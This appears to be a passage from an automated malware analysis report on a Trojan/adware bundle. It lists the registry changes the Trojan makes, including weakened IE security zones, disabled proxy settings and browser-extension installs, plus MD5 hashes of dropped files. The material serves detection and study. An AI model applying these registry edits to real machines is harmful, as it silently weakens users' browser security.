"Seed" = "95 75 8B 87 62 C8 26 BC 8E 24 D8 5D D9 C3 69 C0"

The process %original file name%.exe:344 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"My Video" = ""

[HKLM\SOFTWARE\YTDownloader\Success]
"Install" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPerServer" = "2"
"MaxConnectionsPer1_0Server" = "2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\YTDownloader\Success]
"InstallStr" = "ok"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4D 61 51 63 7D 30 1C 69 56 CC 79 53 C0 C0 91 76"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1304 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CD B7 24 F9 7D 2B 0D FA D5 59 DB 14 18 62 55 E4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:2080 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E6 3C A6 25 F4 DC 9D 07 78 30 B7 0D BB F4 FC F5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:2228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F4 9C 58 28 C4 AC BE 68 96 A5 A3 38 B6 81 5D 7D"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:2300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 EC A0 78 14 02 0F 0D F7 30 77 D6 82 E1 0B 69"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process 7.exe:3088 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\InstalledBrowserExtensions\20891\Status]
"Installed" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\InstalledBrowserExtensions\20891]
"70299" = "SensePlus.V2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\InstalledBrowserExtensions\20891\Status]
"Installed" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "24 C8 04 24 92 36 8E AF 72 2B D8 24 73 58 27 1B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\InstalledBrowserExtensions\20891]
"70299" = "SensePlus.V2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5	File path
aef562147ae3ae32d2881d900025234c	c:\Documents and Settings\All Users\Application Data\ShopperPro\ShopperPro.dll
f35c3c0643fa8ba112fe8d0ad0e683f1	c:\Documents and Settings\All Users\Application Data\ShopperPro\ShopperPro64.dll
05c47da12b0009bd98653f51287f7768	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Install_11820\bxsdk32.dll
77d75a2050444ad0cb48ae3eb1d589e3	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Install_11820\ins_geforce.exe
335aba3761d45d16860d64dc49b1a376	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Install_11820\ins_sense.exe
c605c91aadcbb1556cc6923f21bf4eac	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Install_11820\ins_shopperpro.exe
904beebec2790ee2ca0c90fc448ac7e0	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nseB.tmp\D1958.dll
83239cc64c56ebfbd7448d76ddad0a77	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nseB.tmp\setup.exe
4896a79dc5d7d13664d44323a0347a75	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsv6.tmp\AccDownload.dll
faa7f034b38e729a983965c04cc70fc1	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsv6.tmp\nsProcess.dll
63178a496c4aa577383bcec66d2c8e32	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup[1].exe_a
17ad78d30cb01cb0010320d600269379	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\snsch7[1].exe_a
ff5a237e08c715595ea50111dd495cf0	c:\Program Files\Common Files\System\SysMenu.dll
7581b4fc7146910daaca065202b87429	c:\Program Files\Ge-Force\Uninstall.exe
eab398a0e41ca8c820fc9688fc60d6be	c:\Program Files\Ge-Force\f5963046-cdb9-419e-b034-e988d89c98b9-5.exe
a9d698ca74bba734cc5a8ae4ed935876	c:\Program Files\Ge-Force\utils.exe
071e7aeeecc82f9ee411a3a3a237024d	c:\Program Files\Sense\Uninstall.exe
c46ed855e49abb6e40f84240f1f1e3e2	c:\Program Files\Sense\aaca3934-a6c1-440e-8ac5-21234d851fa1-5.exe
e091beffb11a8b2a604f5f9fe54e9c86	c:\Program Files\Sense\utils.exe
4147c1d55594b405a349196e1e21c0fb	c:\Program Files\ShopperPro\JSDriver\jsdrv.exe
ce826b562b765eba04c2b9424c3b9ddc	c:\Program Files\ShopperPro\JSDriver\jsdrv.sys
5f4564e358add3c76e95693e18a4eb8b	c:\Program Files\ShopperPro\SPRemove.exe
aef562147ae3ae32d2881d900025234c	c:\Program Files\ShopperPro\ShopperPro.dll
db345ac7660e404e01d2e313695de077	c:\Program Files\ShopperPro\ShopperPro.exe
f35c3c0643fa8ba112fe8d0ad0e683f1	c:\Program Files\ShopperPro\ShopperPro64.dll
51b56666ebedd91e529fdcf478aabf8f	c:\Program Files\ShopperPro\Updater.exe
45960b40c1ecb75ed5549a80049879e1	c:\Program Files\YTDownloader\AniGIF.ocx
1b4c2e792580856463e56f58815fe5f9	c:\Program Files\YTDownloader\BrowserHelper.exe
17a8389f04b203b8d3ff817b046f5dc8	c:\Program Files\YTDownloader\BrowserHelperSrv.exe
